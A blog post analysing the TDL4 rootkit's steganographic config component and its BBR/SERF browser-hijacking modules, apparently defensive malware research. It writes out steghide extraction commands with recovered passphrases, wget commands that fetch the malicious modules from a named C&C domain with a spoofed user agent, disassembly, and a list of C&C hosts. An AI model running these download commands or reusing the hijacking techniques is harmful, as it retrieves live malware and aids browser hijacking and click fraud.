Analysis of TDL4 (Part III)
More About steganography
A closer look at the
COM32
component of TDL4, a component that decrypts configuration text from the JPEG images hosted at imageshack.us
and posted into the blogs, reveals that COM32
is a rip-off of the open source project called Steghide - a steganography program, developed by Stefan Hetzl.
Because COM32
is compiled from the publicly available source files, you don't even need to download COM32
module to decrypt the images. Just download the Steghide software, and run it against a JPEG image that can be found on TDL4 blogs.
For example, configuration text from the images 1, 2, and 3 can be recovered by running Steghide as:
steghide.exe extract -sf image.jpg -p A6rprm09lZnVsCn -xf config.txt
Text from another blog's images (4, 5, and 6) can be obtained by running Steghide as:
steghide.exe extract -sf image.jpg -p TOWasfO03gGff58 -xf config.txt
where A6rprm09lZnVsCn
and TOWasfO03gGff58
are the passphrases resulted after decrypting the strings jt5G/KE25R1VSaYny0rr
and m6dj7aA9mhQKdI8X3jy9
from the original configuration file by using RC4 key #1.
BBR232/BBR264 and SERF332/SERF364
These additional modules are downloaded from C&C servers and then loaded into the address space of the browsers. Their purpose is to hijack browsing activity and to re-direct users into various dodgy websites, skewing Google search results, and also serving pop-ups with fake AV products, porn, gambling sites, etc.
To fetch the modules from C&C, the following URL parameters are used:
mode=mod&filename=bbr232
encrypted as CehOKSsUCKLC3skBxcO9fFpCcHXx4Nlw
mode=mod&filename=serf332
encrypted as CehOKSsUCKLC3skBxcO9fFpCYXLxtNlxPw==
Thus, wget
will fetch them when run as:
wget wahinotisifatu.com/?CehOKSsUCKLC3skBxcO9fFpCcHXx4Nlw -U "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) GeckaSeka/20090911 Firefox/3.5.1"
wget wahinotisifatu.com/?CehOKSsUCKLC3skBxcO9fFpCYXLxtNlxPw== -U "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.1) GeckaSeka/20090911 Firefox/3.5.1"
Once decrypted the same way as demonstrated in the previous blog post, BBR232
reveals itself as a module that hijacks Internet Explorer, Chrome, Safari, Opera, Firefox, and Opera browsers. SERF332
is designed for Internet Explorer only as it relies on parsing the window structure of the browser process. BBR264
and SERF364
modules are designed to support 64-bit versions of the browsers.
For example, when processing an intercepted GET
request below:
.text:100156E3 mov edi, ds:StrCmpNIA .text:100156E9 push 4 .text:100156EB push offset aGet ; "GET " .text:100156F0 push ebx .text:100156F1 call edi ; StrCmpNIA .text:100156F3 test eax, eax .text:100156F5 jnz short check_POST_Request .text:100156F7 mov edx, [esp+20h+var_10] .text:100156FB push edx .text:100156FC mov ecx, ebx .text:100156FE call process_GET_request
BBR232
will make sure the host name does not contain any of the following strings:
yimg.
rds.yahoo.
google.
.google
bing.
yahoo.
atdmt.
aolcdn.
atwola.com
.aol.
dmn.aol.
sa.aol.
.icq.
dw.com.
.gstatic.
img.youtube.
i.i.com.
google-analytics.com
.everesttech.
.ixnp.
googleapis.
.alexametrics.
scorecardresearch.com
alltheweb.
altavista.
microsofttranslator.
microsofttranslator.
askcache.
searchapi.search.aol.
cc.msnscache.com
.googlehosted.com
gesualdo.alexa.
BBR232
will also make sure that the requested web page is not pre-fetched by the browser.
In addition, it makes sure the URL string does not include the following strings:
search/cache
/search/search
search/redir
counter.yadro.ru
gstatic.com/inputtools
recaptcha_ajax.js
icq.com/js/cookie_lib.js
survey.122.2o7.net
fls.doubleclick.net
alexa.com
facebook.
BBR232
is able to modify the requested URL by replacing the HTTP referer in it, or replacing some URL parameters, such as "url="
. The hijacking logic of what needs to be modified in the browser session is defined by a configuration file, where page redirects or HTTP referer replacements are defined in the sections enclosed with the tags [redir_urls_begin]
/[redir_urls_end]
, and [ref_replace_begin]
/[ref_replace_end]
respectively. The redirect configuration may potentially be fetched from the servers:
wanstatcteery.com
wahinotisifatu.com
owtotmyne.com
"url="
parameter will be replaced with a different web page, leading to skewed analytics, fraudulent monetization via AdSense, clickjacking, Search Engine Optimisation (SEO) poisoning, and other click fraud that constitutes the "cash cow" business for the TDL/TDSS group.
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home